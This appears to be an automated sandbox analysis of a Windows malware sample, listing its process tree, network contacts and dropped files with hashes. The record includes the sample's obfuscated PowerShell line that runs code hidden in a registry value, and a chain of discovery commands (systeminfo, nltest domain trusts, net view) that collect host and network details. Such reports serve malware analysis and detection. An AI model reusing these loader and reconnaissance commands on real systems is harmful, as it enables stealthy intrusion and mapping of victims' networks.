"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name bjunbw -value gp; new-alias -name dqmwsgwvn -value iex; dqmwsgwvn ([System.Text.Encoding]::ASCII.GetString((bjunbw "HKCU:Software\AppDataLow\Software\Microsoft\FAC9767C-11D1-3C57-6BCE-D530CFE2D964").MaskStop))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4F20.tmp" "c:\Users\Admin\AppData\Local\Temp\qpvas05h\CSCA3E45F721DCC41A99BA936F9208D8B74.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5087.tmp" "c:\Users\Admin\AppData\Local\Temp\e25fyw13\CSC7A9004E1C5EB484596BB47739548E5.TMP"

C:\Windows\system32\control.exe

C:\Windows\system32\control.exe -h

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\net.exe

net view /all

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 13.107.42.16:80 config.edge.skype.com tcp
NL 79.110.52.8:80 79.110.52.8 tcp
RU 5.42.199.72:80 5.42.199.72 tcp
NL 79.110.52.82:80 79.110.52.82 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp

Files

memory/1716-132-0x0000000000000000-mapping.dmp

memory/1716-133-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1716-138-0x0000000001F70000-0x0000000001F7D000-memory.dmp

memory/1520-142-0x0000000000000000-mapping.dmp

memory/1520-143-0x0000022E60900000-0x0000022E60922000-memory.dmp

memory/1520-144-0x00007FFE0C4A0000-0x00007FFE0CF61000-memory.dmp

memory/2812-145-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.cmdline

MD5 6c9aa04fb876e079685966d995bdb398
SHA1 5e75d849b04c782604dd2f7e8a7d61c590ad2fe7
SHA256 9069a1f3043fd0eda2817ba12d85a529e4455af44d411f02bb131451bc50dce8
SHA512 1161df029aaa506f94b45c1527d031361c189ad1bc3ca899bfcabd016aef5052dbedab3db0b2cd9c74dc90df0dd3c7e92f90df46d8b4695df9371f732fe9987b

\??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.0.cs

MD5 9a10482acb9e6952b96f4efc24d9d783
SHA1 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256 a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512 e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

memory/3684-148-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\CSCA3E45F721DCC41A99BA936F9208D8B74.TMP

MD5 488518a0854dc8d2129d0e1623a37a6a
SHA1 f5f381735a11d7b572f0f8617afc5ad69cef2cdd
SHA256 babfdb1d940c0addee61aab483cf71ac5fead11352ae8baa0d980a3bdca8585c
SHA512 105f4f8ef0aa23ec4d6292f12f925563def203ad669aed110cda635903d721cf05ab39bd6a8d727c602d86ee515c79fe231ae46a5fd827228136f72889a6f329

C:\Users\Admin\AppData\Local\Temp\RES4F20.tmp

MD5 01f190bdaec04de221b7e23b41a74673
SHA1 32023da04ece8010950b5fab4c491904eeadc205
SHA256 9cdf726460c06e4331b7a20f0dec43563ccad65d5ff051ad22a0abc7c6688758
SHA512 47d437eeb7252b7d11d15bba087c5b3bcc782115c642f8efc0fc582286c11717046fd96587cb8a704053a7c7ffa6f63aeb67d3283035e94e32671fc6fadf6bb9

C:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.dll

MD5 92be12bfb85cea8510497b97e1deb99a
SHA1 2ae7bc20bf614747a77b9aefb76ab15b3fb66e5f
SHA256 87d6faa6d06cf1ae59c4c5f969aacd6851b256916ac5a086a6f5ea87509e3700
SHA512 079c54e47708c06ba73e7ada9bc305ff02493b1fdcd0fc614b8acd3b4f9473c90e3d7bbca67be83c668c9e88c87b7aed30e761dfbad835e6d1f810d29bd9d3ad

memory/3736-152-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.cmdline

MD5 abe6a4f47746fa860e1827b2c160669a
SHA1 b4dbfa0ea503c044b4111ab819346464e4f26845
SHA256 6e99ca8c4c8a091392752e48beb56fe261b7e55e9d51c2904ef221ebf9e038b3
SHA512 ee7828e0ec18dfb5c2c5421a24021ac7fe81bda3dfbc288bd9a9043da41129ab4b1723f3dac58da79ab0c1d18f12947456944b1089679999cd6a16da62619f60

\??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.0.cs

MD5 aca9704199c51fde14b8bf8165bc2a4c
SHA1 789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256 cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512 a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

memory/4164-155-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\CSC7A9004E1C5EB484596BB47739548E5.TMP

MD5 01c7ea8256a930100666ac66c9292ab6
SHA1 37bf5871ed1239236438b665a914a250f217e32e
SHA256 78ea4ba18db4484a618b4fc713585d7501d670985caa64d86c5485a2b932ebcb
SHA512 9f807460bb3b17166e1f6ec2fadbb74daa3b5063e6971383c91c093430e27ea6d723a1c73a345c2576d4ef42c6bc7da72a84083a9675e37507fa3920af2aae97

C:\Users\Admin\AppData\Local\Temp\RES5087.tmp

MD5 a59eb24fd5eed325703f8d6222d7629c
SHA1 01a89b751816810e82f56bc7a5b10e8c32baabf1
SHA256 5cba1917347a9255c50aa22cf47aaf65a3c9eb544960980f61cacf30c3a5b914
SHA512 096a523455063b05c49e491d3c065351345a9c7fcd82b42bfc9642ee6206e0a3395ed8fdae8990c0ca046fbe7d8de61db08a835904d24b15a7df05a617aa4725

C:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.dll

MD5 6ae7ab6abc2bc1ee1a3679f79e3220e0
SHA1 dd04108b32b3570b14b409f961798359dadae553
SHA256 5e52468c58b126d14bef7c8d9c611de371ec60caaf61456f334bd5a75173ec5c
SHA512 7845c853fadea28684338ffe5e2bd5f263030e507faba8dac30176d34eeb01a56e11b7639031c0f31b20d1dd138fa040599b96383eb60e59fa7458b3bddf61c0

memory/1520-159-0x00007FFE0C4A0000-0x00007FFE0CF61000-memory.dmp

memory/4028-160-0x0000000000000000-mapping.dmp

memory/1520-161-0x0000022E60AA0000-0x0000022E60ADD000-memory.dmp

memory/4244-162-0x0000000000000000-mapping.dmp

memory/4028-163-0x0000000000060000-0x0000000000103000-memory.dmp

memory/3520-164-0x0000017C89D30000-0x0000017C89DD3000-memory.dmp

memory/3784-166-0x0000020E84B50000-0x0000020E84BF3000-memory.dmp

memory/1028-165-0x0000000007ED0000-0x0000000007F73000-memory.dmp

memory/4816-167-0x0000019B45E20000-0x0000019B45EC3000-memory.dmp

memory/4028-169-0x0000000000060000-0x0000000000103000-memory.dmp

memory/4196-171-0x0000000000000000-mapping.dmp

memory/3256-170-0x0000018E06840000-0x0000018E068E3000-memory.dmp

memory/4244-168-0x0000022E4AFD0000-0x0000022E4B073000-memory.dmp

memory/4012-172-0x0000000000000000-mapping.dmp

memory/3240-173-0x0000000000000000-mapping.dmp

memory/3084-174-0x0000000000000000-mapping.dmp

memory/1028-175-0x0000000008BB0000-0x0000000008CEB000-memory.dmp

memory/3240-177-0x00000000006C6B20-0x00000000006C6B24-memory.dmp

memory/3240-180-0x0000000000EC0000-0x0000000000F56000-memory.dmp

memory/1028-181-0x000000000A1C0000-0x000000000A2FA000-memory.dmp

memory/1224-185-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 f7aea2435aa888b709ca20f816c33bfd
SHA1 38717c9a73b5f8bd399839cbe0aa57518427e758
SHA256 f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA512 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

memory/2348-187-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3636-189-0x0000000000000000-mapping.dmp

memory/1028-190-0x0000000007ED0000-0x0000000007F73000-memory.dmp

memory/1308-191-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 debbdb9be3bb09adf5d355ab9c36187a
SHA1 f44a6c37253abc4ad266d46b4b62d50398e0c570
SHA256 cf7ef451454095e3ea0011ce0aa85072d81794210f496506388ed080671bf643
SHA512 f6c682f54d4b64bbf5554ba9af9a39645de00885a9819eb6a76a61d5539fa888c39602a03cc6ba1bfaa0b30c101b1092217c3e8ef288426f71c3411fa0b68332

memory/1448-193-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 debbdb9be3bb09adf5d355ab9c36187a
SHA1 f44a6c37253abc4ad266d46b4b62d50398e0c570
SHA256 cf7ef451454095e3ea0011ce0aa85072d81794210f496506388ed080671bf643
SHA512 f6c682f54d4b64bbf5554ba9af9a39645de00885a9819eb6a76a61d5539fa888c39602a03cc6ba1bfaa0b30c101b1092217c3e8ef288426f71c3411fa0b68332

memory/2136-195-0x0000000000000000-mapping.dmp

memory/3756-196-0x0000000000000000-mapping.dmp

memory/3588-197-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 d4261765df37d03c995a3f88337551b9
SHA1 31303377a5d5808157badd5a7be5c87f673d937a
SHA256 26b2ede70ff95672d6c7c3ad8a6140e333ff97d8671c56a4ecbf2527ceec3a08
SHA512 4b7fa34739bc78de8a0a5d71ea56a47d34f107ba9dd543e87a0e74c92e0f21b14c06c8c1ed904a693b3e2037a52a87ffa8545adc2b6de5b132f1579bc9e4ad83

memory/3116-199-0x0000000000000000-mapping.dmp

memory/4924-200-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 f3732be8e8ad283b090cb47ded28b20b
SHA1 c880ff4fcfcc3d92ffaaa02cb0c38151661989b8
SHA256 b04651609ff611cd455dfa95c12b5e1bfd6b04baa67fdee66547c08b033bb73b
SHA512 1eb0395ab8ecfe5e06315d3e71854a6c054821feb36e5d1b431c4ca54e0b07d5ea8ca9b2102d3d627fbdf70691c29cc23e7809acff23d2bcb0e7ad738e40cc5a

memory/396-202-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 f3732be8e8ad283b090cb47ded28b20b
SHA1 c880ff4fcfcc3d92ffaaa02cb0c38151661989b8
SHA256 b04651609ff611cd455dfa95c12b5e1bfd6b04baa67fdee66547c08b033bb73b
SHA512 1eb0395ab8ecfe5e06315d3e71854a6c054821feb36e5d1b431c4ca54e0b07d5ea8ca9b2102d3d627fbdf70691c29cc23e7809acff23d2bcb0e7ad738e40cc5a

memory/1208-204-0x0000000000000000-mapping.dmp

memory/1272-205-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 eafa11d2f82e86981c80a77d3c8621bc
SHA1 c796b1c198d2c0d3acd73215bb3320b8261d660a
SHA256 6cb061fa9c465cab49795750b943a79832c1d5dbc685e7ab6e4e6b2d5d6e4880
SHA512 d95abdc4cbd9b3c1775bf8eee76651daad15dacbad3888b0a36e54a3a76169dbb624e11bcad43d204ffc650169d657974be12a7bf93fb5dc3dc94e51e2e5c2cf

memory/5004-207-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 28cefb694a0586baee4068b1b707ee3f
SHA1 5d90d010403e168576e861f9f5dc832649fb1fa5
SHA256 dcf901d2adf9af1ae75fabf121e350849d03cb0b2c2aabefdc06f25cb1ba58fc
SHA512 ed219a37df106104237d5034e18f5ebb6f4d766df140586848597f7bf773e22dde330f9d9be3a71f3214a143556c9a4e0cf347376979cdbcbece7d3604f7a0ec

memory/1956-209-0x0000000000000000-mapping.dmp

memory/4560-210-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 91dd82dc33272e52b2b0634128912fc3
SHA1 5b31d5b431db80873bc8501ca96401c69da84e76
SHA256 533b8a08428ee97abe45244f3133ab3d3c40022ecef388d6aa5cbff79c784c9b
SHA512 19c4165763766db298c97c2254e5285560526f2bbb5a21ac84dbdd2fd116b6fdb01de5d447cb34c2a150f14ce8d1a546a317460715dd54a3bc9890a17c374348

memory/5076-212-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 91dd82dc33272e52b2b0634128912fc3
SHA1 5b31d5b431db80873bc8501ca96401c69da84e76
SHA256 533b8a08428ee97abe45244f3133ab3d3c40022ecef388d6aa5cbff79c784c9b
SHA512 19c4165763766db298c97c2254e5285560526f2bbb5a21ac84dbdd2fd116b6fdb01de5d447cb34c2a150f14ce8d1a546a317460715dd54a3bc9890a17c374348

memory/3164-214-0x0000000000000000-mapping.dmp

memory/3428-215-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 bc99dc8482dbf6e658713e410a772962
SHA1 5120b2893f19960db065bc2fc777941ad8a7e4f7
SHA256 39080d4c825ce4ddc40b2d8266888806572e688728d7bc040408d20a82343d0b
SHA512 3bc5ef394d549b2ab0c8c2e1c69d6c10dad924adb98cf67f13463fcd88f48022886c17d601ba839d7c61cfa20ace99bb76f4ef7df07811eb68046ac257ded7f2

memory/2076-217-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 bc99dc8482dbf6e658713e410a772962
SHA1 5120b2893f19960db065bc2fc777941ad8a7e4f7
SHA256 39080d4c825ce4ddc40b2d8266888806572e688728d7bc040408d20a82343d0b
SHA512 3bc5ef394d549b2ab0c8c2e1c69d6c10dad924adb98cf67f13463fcd88f48022886c17d601ba839d7c61cfa20ace99bb76f4ef7df07811eb68046ac257ded7f2

memory/3636-219-0x0000000000000000-mapping.dmp

memory/4304-220-0x0000000000000000-mapping.dmp

memory/3632-221-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 9584e50ab516f8f3d8473f756acf9a7c
SHA1 f3ef6233adf9681aefbf67c2c83566518c921ee6
SHA256 287dc1224253a6cb5e5c220f6193da429a37fe93090cf4ecf21591f14cfa9afd
SHA512 5a0660cd05081cb4023e5f688fe90f61ff8d1a540d5a0e8192b54fb59d299079a2025e0a060be531895a825cb1638508136b4c27372f4ef818db28d79667b1c5

memory/4992-223-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 9584e50ab516f8f3d8473f756acf9a7c
SHA1 f3ef6233adf9681aefbf67c2c83566518c921ee6
SHA256 287dc1224253a6cb5e5c220f6193da429a37fe93090cf4ecf21591f14cfa9afd
SHA512 5a0660cd05081cb4023e5f688fe90f61ff8d1a540d5a0e8192b54fb59d299079a2025e0a060be531895a825cb1638508136b4c27372f4ef818db28d79667b1c5

memory/3960-225-0x0000000000000000-mapping.dmp

memory/4552-226-0x0000000000000000-mapping.dmp

memory/4508-227-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 d8cf63e49c3f22e79e05dde487f6f2f2
SHA1 7fc8c73ceaf0d108b9d8a2a325ad05ed1413a104
SHA256 93e3177026041e353d040d414a06570490aea739a2bcb57520532e8f216749c1
SHA512 f437bc7bf48089acc46f10596adbf069cc12e8ce5ef6d0520f73e5e828a196e0c4a2b087f118b469deb2795c02c55f53c2a54dfcbc2d85a3a803084d41ecacd8

memory/2812-229-0x0000000000000000-mapping.dmp

memory/3272-230-0x0000000000000000-mapping.dmp

memory/1160-231-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 6d26aa73f630a7f0276b0cd428f1de06
SHA1 5a0084e7e4bd9aff05543636ca23bea0bf0dcb2a
SHA256 6bdcab6cb14d61e0ccc90a59692b1e44ad4c1624b0628318e2410d9333a12203
SHA512 a3f6d623a0e7ec89416f28277774c35f146102ab443695cb321c0154ca37061333035bb504bda3d786a00c49c0d1aca51f325eb02623304cd0dfcfd4e244282f

memory/2588-233-0x0000000000000000-mapping.dmp

memory/856-234-0x0000000000000000-mapping.dmp

memory/4352-235-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3BC.bin1

MD5 4746429b9b2c92103225650b6059c26a
SHA1 df81d1724ecd7f3c09945120dc0022d0f7d4bb23
SHA256 f59ddebc18b1d25727aa3ab6f4046c987e063917da6fa0d9419397a6243d0db6
SHA512 17f0128be903af9bed8f96bd4c296690d0ddf63658b50efca0efa7fea0da07db830e7eae5bdc0c3b7f6da7389a5e528a3929110d731d12c290c5da6c1a943e96

memory/4452-237-0x0000000000000000-mapping.dmp